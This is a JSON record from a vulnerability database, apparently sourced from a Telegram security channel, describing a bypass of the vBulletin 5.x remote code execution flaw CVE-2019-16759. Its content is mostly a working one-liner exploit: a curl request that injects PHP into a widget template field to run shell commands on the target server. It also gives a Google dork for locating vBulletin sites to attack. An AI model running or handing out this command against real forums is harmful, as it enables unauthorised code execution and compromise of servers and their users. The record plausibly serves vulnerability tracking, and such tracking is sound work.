{"uuid": "07588994-eb35-4015-ad36-2856c79943c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1779", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 One-liner RCE: vBulletin 5xx fixes ridiculously easy to exploit zero-day RCE bug. This is bypass for CVE-2019-16759.\n\nExploit code PoC: curl -s\n http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec(\"id\"); exit;'\n\nGoogle dork:\nintext:\"Powered by vBulletin\"\n\nhttps://www.bleepingcomputer.com/news/security/vbulletin-fixes-ridiculously-easy-to-exploit-zero-day-rce-bug/\n\nhttps://mobile.twitter.com/h4x0r_dz/status/1292759555034828800", "creation_timestamp": "2020-08-11T07:24:44.000000Z"}